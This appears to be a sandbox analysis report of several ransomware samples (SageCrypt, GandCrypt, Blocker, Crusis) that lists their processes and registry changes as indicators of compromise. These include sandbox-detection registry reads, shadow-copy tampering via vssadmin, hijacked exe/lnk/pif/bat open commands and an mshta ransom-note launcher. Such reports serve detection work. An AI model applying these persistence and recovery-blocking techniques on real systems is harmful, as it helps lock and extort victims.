pid Process 5632 Process not Found 7400 cmd.exe 5388 PING.EXE 5412 shell.exe 3924 cmd.exe 3620 PING.EXE 4992 cmd.exe 7428 cmd.exe 5828 PING.EXE 3268 PING.EXE 7356 cmd.exe 7744 cmd.exe 3572 PING.EXE 4772 shell.exe 1944 shell.exe 5968 shell.exe 6744 shell.exe 6508 shell.exe 1116 shell.exe 5296 cmd.exe 6136 shell.exe 8180 Process not Found 3300 shell.exe 4220 shell.exe 5720 shell.exe 3228 shell.exe 3836 Process not Found 4884 PING.EXE 6112 shell.exe 1172 shell.exe 2940 shell.exe 264 cmd.exe 5164 cmd.exe 2728 shell.exe 3916 shell.exe 6472 shell.exe 7696 cmd.exe 2944 shell.exe 5536 shell.exe 6420 PING.EXE 3040 PING.EXE 2168 PING.EXE 6064 PING.EXE 5684 shell.exe 6740 shell.exe 2384 shell.exe 2116 shell.exe 5044 shell.exe 5792 PING.EXE 4704 cmd.exe 7548 cmd.exe 6896 cmd.exe 3544 cmd.exe 4424 shell.exe 4660 shell.exe 5404 shell.exe 7840 cmd.exe 3452 cmd.exe 6700 cmd.exe 108 PING.EXE -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe -
Interacts with shadow copies 3 TTPs 9 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 5892 vssadmin.exe 6340 vssadmin.exe 3192 vssadmin.exe 856 vssadmin.exe 3788 vssadmin.exe 4812 vssadmin.exe 5156 vssadmin.exe 4884 vssadmin.exe 1640 vssadmin.exe -
Modifies Control Panel 17 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\Desktop\ScreenSaverIsSecure = "0" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\PowerCfg\PowerPolicies\0 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\Desktop\ Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\Desktop\SCRNSAVE.EXE = "C:\\Windows\\system32\\Mig~mig.SCR" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\PowerCfg\CurrentPowerPolicy = "0" Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\PowerCfg\PowerPolicies\0\Policies = 01000000020000000100000000000000020000000000000000000000000000002c0100003232000304000000040000000000000000000000b00400002c01000000000000580200000101645064640000 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\PowerCfg\GlobalPowerPolicy\Policies = 01000000060000000300000010000000060000000300000010000000020000000300000000000000020000000300000000000000020000000100000000000000020000000100000000000000000000000500000000000000000000c00000000005000000000000000a0000000000000003000000010001000100000000000000000000000000000000000000000002000000000000000000000000000000000000000000000003000000000016000000 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\PowerCfg Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\Desktop\ScreenSaveTimeOut = "600" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\PowerCfg\GlobalPowerPolicy Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\PowerCfg\GlobalPowerPolicy\Policies = 01000000060000000300000010000000060000000300000010000000020000000300000000000000020000000300000000000000020000000100000000000000020000000100000000000000000000000500000000000000000000c00000000005000000000000000a0000000000000003000000010001000100000000000000000000000000000000000000000002000000000000000000000000000000000000000000000003000000000016000000 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\PowerCfg Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\PowerCfg\PowerPolicies\0 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\PowerCfg\GlobalPowerPolicy Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\PowerCfg\PowerPolicies\0\Policies = 01000000020000000100000000000000020000000000000000000000000000002c0100003232000304000000040000000000000000000000b00400002c01000000000000580200000101645064640000 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\PowerCfg\CurrentPowerPolicy = "0" Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\Desktop Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{35DD9730-9D28-11EF-B4E2-F64010A3169C} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE -
Modifies data under HKEY_USERS 42 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\AppDataLow Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe Key created \REGISTRY\USER\S-1-5-20\Software\AppDataLow\BoylqG40 Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\AppDataLow\BoylqG40\mJD9QIm5 = 03bea8453139082506393040052e3fd800d4b346afb8b2966b92641b3ebf3d4ecf46b47505e623ae84036f40f6912dd05bac425406d2eed8abd252d0e4072f420100000000000000 Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\BoylqG40\mJD9QIm5 = 03bea8453139082506393040052e3fd800d4b346afb8b2966b92641b3ebf3d4ecf46b47505e623ae84036f40f6912dd05bac425406d2eed8abd252d0e4072f420100000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-18 explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\BoylqG40 Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\BoylqG40\mJD9QIm5 = 03bea8453139082506393040052e3fd800d4b346afb8b2966b92641b3ebf3d4ecf46b47505e623ae84036f40f6912dd05bac425406d2eed8abd252d0e4072f420100000000000000 Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\AppDataLow\BoylqG40\mJD9QIm5 = 03bea8453139082506393040052e3fd800d4b346afb8b2966b92641b3ebf3d4ecf46b47505e623ae84036f40f6912dd05bac425406d2eed8abd252d0e4072f420100000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-20\Software\AppDataLow\BoylqG40 explorer.exe Key created \REGISTRY\USER\S-1-5-18 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Key created \REGISTRY\USER\S-1-5-19 Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe Key created \REGISTRY\USER\S-1-5-19\Software\BoylqG40 Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe Key created \REGISTRY\USER\S-1-5-20\Software\BoylqG40 Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe Key created \REGISTRY\USER\.DEFAULT explorer.exe Key created \REGISTRY\USER\S-1-5-19 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Key created \REGISTRY\USER\S-1-5-20 Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D msiexec.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\AppDataLow\BoylqG40 Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe Key created \REGISTRY\USER\.DEFAULT\Software\AppDataLow\BoylqG40 explorer.exe Key created \REGISTRY\USER\S-1-5-19\Software\AppDataLow\BoylqG40 explorer.exe Key created \REGISTRY\USER\S-1-5-19\Software\BoylqG40 explorer.exe Key created \REGISTRY\USER\S-1-5-20 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\AppDataLow\BoylqG40\mJD9QIm5 = 03bea8453139082506393040052e3fd800d4b346afb8b2966b92641b3ebf3d4ecf46b47505e623ae84036f40f6912dd05bac425406d2eed8abd252d0e4072f420100000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-19 explorer.exe Key created \REGISTRY\USER\S-1-5-20\Software\BoylqG40 explorer.exe Key created \REGISTRY\USER\.DEFAULT Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Key created \REGISTRY\USER\.DEFAULT\Software\AppDataLow\BoylqG40 Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe Key created \REGISTRY\USER\.DEFAULT\Software Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe Key created \REGISTRY\USER\S-1-5-18 Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\AppDataLow\BoylqG40\mJD9QIm5 = 03bea8453139082506393040052e3fd800d4b346afb8b2966b92641b3ebf3d4ecf46b47505e623ae84036f40f6912dd05bac425406d2eed8abd252d0e4072f420100000000000000 Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\BoylqG40\mJD9QIm5 = 03bea8453139082506393040052e3fd800d4b346afb8b2966b92641b3ebf3d4ecf46b47505e623ae84036f40f6912dd05bac425406d2eed8abd252d0e4072f420100000000000000 Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\AppDataLow\BoylqG40\mJD9QIm5 = 03bea8453139082506393040052e3fd800d4b346afb8b2966b92641b3ebf3d4ecf46b47505e623ae84036f40f6912dd05bac425406d2eed8abd252d0e4072f420100000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-19\Software\AppDataLow\BoylqG40 Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe Key created \REGISTRY\USER\S-1-5-20 Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\BoylqG40\mJD9QIm5 = 03bea8453139082506393040052e3fd800d4b346afb8b2966b92641b3ebf3d4ecf46b47505e623ae84036f40f6912dd05bac425406d2eed8abd252d0e4072f420100000000000000 Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\BoylqG40\mJD9QIm5 = 03bea8453139082506393040052e3fd800d4b346afb8b2966b92641b3ebf3d4ecf46b47505e623ae84036f40f6912dd05bac425406d2eed8abd252d0e4072f420100000000000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\BoylqG40\mJD9QIm5 = 03bea8453139082506393040052e3fd800d4b346afb8b2966b92641b3ebf3d4ecf46b47505e623ae84036f40f6912dd05bac425406d2eed8abd252d0e4072f420100000000000000 explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\AppDataLow\BoylqG40\mJD9QIm5 = 03bea8453139082506393040052e3fd800d4b346afb8b2966b92641b3ebf3d4ecf46b47505e623ae84036f40f6912dd05bac425406d2eed8abd252d0e4072f420100000000000000 Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe Key created \REGISTRY\USER\.DEFAULT\Software\BoylqG40 explorer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E msiexec.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\sage.notice\DefaultIcon Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\sage.notice\shell\open\command\ = "mshta.exe \"C:\\Users\\Admin\\AppData\\Roaming\\f1.hta\" \"%1\"" Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_Classes\Local Settings Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\BA887275\Shell\Open\Command otheo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\sage.notice\FriendlyTypeName\ = "encrypted by SAGE" Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\ShellEx msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\sage.notice Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\edit\command msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\sage.notice\shell\open\command\ = "mshta.exe \"C:\\Users\\Admin\\AppData\\Roaming\\f2.hta\" \"%1\"" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\ShellEx\IconHandler\ = "{AB968F1E-E20B-403A-9EB8-72EB0EB6797E}" msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Software\AppDataLow\BoylqG40\mJD9QIm5 = 03bea8453139082506393040052e3fd800d4b346afb8b2966b92641b3ebf3d4ecf46b47505e623ae84036f40f6912dd05bac425406d2eed8abd252d0e4072f420100000000000000 Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\BA887275\DefaultIcon\ = "%SystemRoot%\\SysWow64\\shell32.dll,47" otheo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\system32\\shell.exe\" \"%1\" %*" Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\sage.notice\FriendlyTypeName explorer.exe Key created \REGISTRY\MACHINE\Software\Classes\xmlfile\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Software\AppDataLow\BoylqG40\mJD9QIm5 = 03bea8453139082506393040052e3fd800d4b346afb8b2966b92641b3ebf3d4ecf46b47505e623ae84036f40f6912dd05bac425406d2eed8abd252d0e4072f420100000000000000 explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\BA887275 otheo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\BA887275\DefaultIcon otheo.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\sage.notice\DefaultIcon\ = "%WinDir%\\system32\\shell32.dll,47" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\open\command\ = "\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE\" /verb open \"%1\"" msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\Software\BoylqG40\mJD9QIm5 = 03bea8453139082506393040052e3fd800d4b346afb8b2966b92641b3ebf3d4ecf46b47505e623ae84036f40f6912dd05bac425406d2eed8abd252d0e4072f420100000000000000 Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\.sage\ = "sage.notice" explorer.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\open msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\xmlfile\shell\open msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\sage.notice\shell\open\command Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\sage.notice\shell\open Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\sage.notice\shell\open\command explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sage.notice\FriendlyTypeName\ = "encrypted file" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\BA887275\Shell\Open\Command\ = "mshta.exe vbscript:Execute(\"CreateObject(\"\"WScript.Shell\"\").Run(\"\"[HOW_TO_DECRYPT_FILES].html\"\"):close\")" otheo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\.sage Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\sage.notice\DefaultIcon\ = "%WinDir%\\SysWow64\\shell32.dll,47" Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sage.notice\shell explorer.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\.sage\ = "sage.notice" Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\sage.notice\DefaultIcon explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.sage explorer.exe Key created \REGISTRY\MACHINE\Software\Classes\xmlfile\ShellEx\IconHandler msiexec.exe Key created 